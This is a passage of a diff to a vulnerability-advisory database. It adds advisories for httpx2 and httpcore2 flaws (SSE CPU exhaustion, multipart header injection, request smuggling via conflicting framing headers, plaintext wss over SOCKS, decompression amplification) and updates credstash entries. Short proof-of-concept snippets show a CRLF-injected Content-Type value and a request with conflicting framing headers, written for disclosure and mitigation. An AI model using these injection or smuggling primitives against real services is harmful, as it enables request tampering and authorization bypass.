"pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Quadratic SSE line buffering can cause CPU denial of service", + "details": "### Summary\n\nHTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.\n\n### Details\n\nBefore version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.\n\nThe behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.\n\n### Impact\n\nApplications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.\n\n### Mitigation\n\nUpgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.\n\nIf upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-f2fp-rgf2-35cp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84378" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1071" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1117" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/cbfc0e04ef6507da29ccbb3b9c2e5b23dd693414" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-bump-my-version-CVE-2026-84379.json b/advisories/BREW-bump-my-version-CVE-2026-84379.json new file mode 100644 index 0000000000..2bd0eb62ce --- /dev/null +++ b/advisories/BREW-bump-my-version-CVE-2026-84379.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bump-my-version-CVE-2026-84379", + "published": "2026-09-10T18:58:22Z", + "modified": "2026-09-10T18:58:22Z", + "upstream": [ + "GHSA-h4x7-gw46-3wm6", + "CVE-2026-84379", + "PYSEC-2026-3848" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bump-my-version", + "purl": "pkg:brew/bump-my-version" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.5.1_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Multipart part header injection via unvalidated file Content-Type and custom headers", + "details": "### Summary\n\nHTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.\n\n### Details\n\nThe three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"https://example.com/upload\",\n headers={\"Content-Type\": \"multipart/form-data; boundary=BOUNDARY\"},\n files={\n \"file\": (\n \"safe.txt\",\n b\"payload\",\n \"text/plain\\r\\nX-Injected: true\",\n )\n },\n)\n\nprint(request.read().decode())\n```\n\nThe generated body contains an attacker-injected part header:\n\n```text\n--BOUNDARY\nContent-Disposition: form-data; name=\"file\"; filename=\"safe.txt\"\nContent-Type: text/plain\nX-Injected: true\n\npayload\n--BOUNDARY--\n```\n\nThe same issue affects names and values in the custom header mapping from the four-element tuple.\n\nField names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.\n\n### Impact\n\nApplications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.\n\nThis does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.\n\nIf upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-h4x7-gw46-3wm6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84379" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1142" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/de96d810ee4e309d118982fe7084a46a2bcd600d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-bump-my-version-CVE-2026-84380.json b/advisories/BREW-bump-my-version-CVE-2026-84380.json new file mode 100644 index 0000000000..73efd65c38 --- /dev/null +++ b/advisories/BREW-bump-my-version-CVE-2026-84380.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bump-my-version-CVE-2026-84380", + "published": "2026-09-10T18:58:22Z", + "modified": "2026-09-10T18:58:22Z", + "upstream": [ + "GHSA-pf96-p4fj-6566", + "CVE-2026-84380", + "PYSEC-2026-3849" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bump-my-version", + "purl": "pkg:brew/bump-my-version" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.5.1_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Conflicting Content-Length and Transfer-Encoding headers can be auto-generated", + "details": "### Summary\n\nHTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.\n\n### Details\n\nWhen a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"http://example.com/\",\n headers={\"Transfer-Encoding\": \"chunked\"},\n content=b\"test 123\",\n)\n\nprint(request.headers)\n```\n\nThe request contains both:\n\n```text\nTransfer-Encoding: chunked\nContent-Length: 8\n```\n\nOn an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.\n\nStreaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.\n\n### Impact\n\nAn attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.\n\nDepending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.\n\nIf upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-pf96-p4fj-6566" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84380" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1137" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/829b93a2393212996f613e635261f777d9ec6eab" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-bump-my-version-CVE-2026-84381.json b/advisories/BREW-bump-my-version-CVE-2026-84381.json new file mode 100644 index 0000000000..2fb298eeb7 --- /dev/null +++ b/advisories/BREW-bump-my-version-CVE-2026-84381.json @@ -0,0 +1,98 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bump-my-version-CVE-2026-84381", + "published": "2026-09-10T18:58:21Z", + "modified": "2026-09-10T18:58:21Z", + "upstream": [ + "GHSA-7mj9-2mp8-4m2p", + "CVE-2026-84381", + "PYSEC-2026-3844", + "PYSEC-2026-3845" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bump-my-version", + "purl": "pkg:brew/bump-my-version" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.5.1_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpcore2", + "resource_purl": "pkg:pypi/httpcore2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpcore2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpcore2@2.12.0", + "resource": "httpcore2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Secure WebSocket traffic sent without TLS through SOCKS proxies", + "details": "### Summary\n\nhttpcore2 does not start TLS for `wss://` connections routed through a SOCKS5 proxy. The WebSocket opening handshake and all subsequent frames are sent in plaintext through the proxy path, despite the caller selecting the secure `wss` scheme.\n\nThe transport flaw affects httpcore2 releases before `2.10.0`. HTTPX2 exposed this behavior through its public `Client.websocket()` and `AsyncClient.websocket()` APIs from `2.6.0` through `2.9.1`.\n\n### Details\n\nThe synchronous and asynchronous SOCKS5 connection implementations upgrade the established proxy tunnel to TLS only when the remote origin scheme is `https`. The equivalent check does not include `wss`. After the SOCKS5 handshake succeeds, the raw stream is therefore passed directly to the HTTP/1.1 connection, which writes the WebSocket upgrade request without first performing a TLS handshake or verifying the destination certificate.\n\nFor example, an application using HTTPX2 `2.6.0` through `2.9.1` may open an authenticated WebSocket through a SOCKS proxy:\n\n```python\nimport httpx2\n\nwith httpx2.Client(proxy=\"socks5://proxy.example:1080\") as client:\n with client.websocket(\n \"wss://service.example/private?token=query-secret\",\n headers={\"Authorization\": \"Bearer header-secret\"},\n cookies={\"session\": \"cookie-secret\"},\n ) as websocket:\n websocket.send_text(\"private message\")\n```\n\nOn affected versions, the stream passing through the SOCKS proxy begins with a plaintext request such as:\n\n```text\nGET /private?token=query-secret HTTP/1.1\nHost: service.example\nAuthorization: Bearer header-secret\nCookie: session=cookie-secret\n```\n\nBefore HTTPX2 `2.6.0`, the same underlying httpcore2 behavior could be reached by integrations constructing a WebSocket upgrade request through the low-level transport API, but HTTPX2 did not yet provide its native WebSocket client API.\n\nA normal secure WebSocket server will usually reject these plaintext bytes because it expects a TLS ClientHello. However, a malicious or compromised SOCKS proxy can accept the SOCKS connection, observe the plaintext handshake, return a forged `101 Switching Protocols` response, and then read or modify WebSocket frames in both directions. An observer between the proxy and destination may also read the plaintext traffic.\n\nRFC 6455 requires a client using a secure WebSocket connection to perform the TLS handshake before sending the WebSocket opening handshake. A `wss` URI promises confidentiality, integrity, and endpoint authentication through TLS.\n\n### Impact\n\nAn attacker able to control or observe the SOCKS proxy path can obtain URL query parameters, authorization headers, cookies, and application messages that the caller expected TLS to protect. Because no TLS handshake occurs, certificate verification also does not occur, allowing an attacker controlling the proxy to impersonate the WebSocket server and inject or alter messages.\n\nOnly `wss://` connections routed through a SOCKS5 proxy are affected. Direct `wss://` connections and ordinary `https://` requests through SOCKS already start TLS correctly.\n\n### Mitigation\n\nUpgrade HTTPX2 and httpcore2 to `2.10.0` or later. Patched versions start TLS for both `https` and `wss` origins in the synchronous and asynchronous SOCKS5 connection paths.\n\nIf upgrading is not immediately possible, do not route `wss://` connections through a SOCKS proxy. Use a direct secure WebSocket connection or another transport that performs and verifies TLS to the WebSocket origin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-7mj9-2mp8-4m2p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84381" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1104" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/fb008dd700b761d955210d9692475c3e2f379453" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-bump-my-version-CVE-2026-84382.json b/advisories/BREW-bump-my-version-CVE-2026-84382.json new file mode 100644 index 0000000000..773b691f93 --- /dev/null +++ b/advisories/BREW-bump-my-version-CVE-2026-84382.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bump-my-version-CVE-2026-84382", + "published": "2026-09-10T18:58:21Z", + "modified": "2026-09-10T18:58:21Z", + "upstream": [ + "GHSA-8xx6-hgc6-gc2m", + "CVE-2026-84382", + "PYSEC-2026-3846" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bump-my-version", + "purl": "pkg:brew/bump-my-version" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.5.1_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.12.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Streaming response decompression does not bound peak memory (decompression amplification)", + "details": "### Summary\n\nWhen decoding a compressed response body (`gzip`, `deflate`, `br`, or `zstd`), HTTPX2 fully decompressed each network read before yielding content to the application. A small compressed input could therefore cause a large intermediate memory allocation, even when the application streamed the response to keep memory usage bounded.\n\n### Details\n\nHTTPX2's default transport reads the socket in pieces of up to 64 KiB. Before `2.12.0`, each piece was inflated completely into one intermediate allocation before any decompressed bytes were yielded.\n\nAt DEFLATE's maximum compression ratio of roughly 1032:1, a 64 KiB compressed chunk can expand to about 64 MiB in one allocation. Brotli and Zstandard responses can cause similarly large amplification. Streaming the response did not prevent these transient allocations.\n\n### Impact\n\nApplications that fetch resources from untrusted or attacker-influenced servers - such as webhook receivers, link unfurlers, crawlers, SSRF-reachable fetchers, and redirect followers - can experience memory pressure or out-of-memory termination when processing a malicious compressed response. No authentication or user interaction is required beyond issuing a request to the server.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.12.0` or later. Patched versions decompress responses incrementally with bounded intermediate buffers, including responses with multiple content encodings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-8xx6-hgc6-gc2m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84382" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1126" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/4fd0c70a3f207c618b145934792f791bccfb39f8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.12.0" + } + ] +} diff --git a/advisories/BREW-credstash-CVE-2016-9015.json b/advisories/BREW-credstash-CVE-2016-9015.json index f00e819f74..75d92fedad 100644 --- a/advisories/BREW-credstash-CVE-2016-9015.json +++ b/advisories/BREW-credstash-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2016-9015", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2018-20060.json b/advisories/BREW-credstash-CVE-2018-20060.json index 2951c1224e..b542aae89e 100644 --- a/advisories/BREW-credstash-CVE-2018-20060.json +++ b/advisories/BREW-credstash-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2018-20060", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2018-25091.json b/advisories/BREW-credstash-CVE-2018-25091.json index 9466ac3fe3..a2150145d6 100644 --- a/advisories/BREW-credstash-CVE-2018-25091.json +++ b/advisories/BREW-credstash-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2018-25091", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2019-11236.json b/advisories/BREW-credstash-CVE-2019-11236.json index 07d1bcf14d..2739f538cc 100644 --- a/advisories/BREW-credstash-CVE-2019-11236.json +++ b/advisories/BREW-credstash-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2019-11236", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2019-11324.json b/advisories/BREW-credstash-CVE-2019-11324.json index 36875187b7..d993cab4d2 100644 --- a/advisories/BREW-credstash-CVE-2019-11324.json +++ b/advisories/BREW-credstash-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2019-11324", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2020-26137.json b/advisories/BREW-credstash-CVE-2020-26137.json index 7b53e19b9c..f790d856ac 100644 --- a/advisories/BREW-credstash-CVE-2020-26137.json +++ b/advisories/BREW-credstash-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2020-26137", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2020-7212.json b/advisories/BREW-credstash-CVE-2020-7212.json index 72017723ed..2af6cb5ab0 100644 --- a/advisories/BREW-credstash-CVE-2020-7212.json +++ b/advisories/BREW-credstash-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2020-7212", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2021-28363.json b/advisories/BREW-credstash-CVE-2021-28363.json index 9858337f96..0bab925894 100644 --- a/advisories/BREW-credstash-CVE-2021-28363.json +++ b/advisories/BREW-credstash-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2021-28363", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2021-33503.json b/advisories/BREW-credstash-CVE-2021-33503.json index 42643130f5..bbbb3a9be0 100644 --- a/advisories/BREW-credstash-CVE-2021-33503.json +++ b/advisories/BREW-credstash-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2021-33503", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2023-43804.json b/advisories/BREW-credstash-CVE-2023-43804.json index a71d7d2a51..1baec24299 100644 --- a/advisories/BREW-credstash-CVE-2023-43804.json +++ b/advisories/BREW-credstash-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2023-43804", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2023-45803.json b/advisories/BREW-credstash-CVE-2023-45803.json index 1adef79558..7d0ddda3ed 100644 --- a/advisories/BREW-credstash-CVE-2023-45803.json +++ b/advisories/BREW-credstash-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2023-45803", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2024-37891.json b/advisories/BREW-credstash-CVE-2024-37891.json index 30bcd2d5a6..49754c32a3 100644 --- a/advisories/BREW-credstash-CVE-2024-37891.json +++ b/advisories/BREW-credstash-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2024-37891", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2025-50181.json b/advisories/BREW-credstash-CVE-2025-50181.json index db5687210e..cf4b59e177 100644 --- a/advisories/BREW-credstash-CVE-2025-50181.json +++ b/advisories/BREW-credstash-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2025-50181", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2025-50182.json 